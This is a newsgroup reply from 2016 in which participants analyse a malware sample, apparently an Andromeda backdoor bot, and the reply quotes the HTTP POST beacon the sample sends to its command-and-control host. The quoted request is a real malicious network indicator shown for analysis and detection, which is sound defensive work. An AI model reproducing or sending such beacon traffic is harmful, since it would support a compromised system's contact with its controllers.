On 4/9/2016 1:23 PM, Virus Guy wrote:
> "David H. Lipman" wrote:
>
>> On 4/7/2016 9:22 AM, Virus Guy wrote:
>>> This came in almost 3 hours ago:
>>
>> There is a big difference between Sality and an Andromeda backdoor
>> bot.  If it was truly Sality, all anti virus vendors would have
>> that detection.
>
> I did upload it to uploadmalware - so you should have access to it.
>
> malwr.com analysis shows http traffic, but they seem to be posts, not
> gets.  So it wasn't clear to me if there were any visible or operable
> payload URL's to be had.
>

As a Backdoor, it has to Beacon the compromised system and/or Phone Home.

POST /allow.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; 
Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 42
Host: betaleuco.net





-- 
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp
--- NewsGate v1.0 gamma 2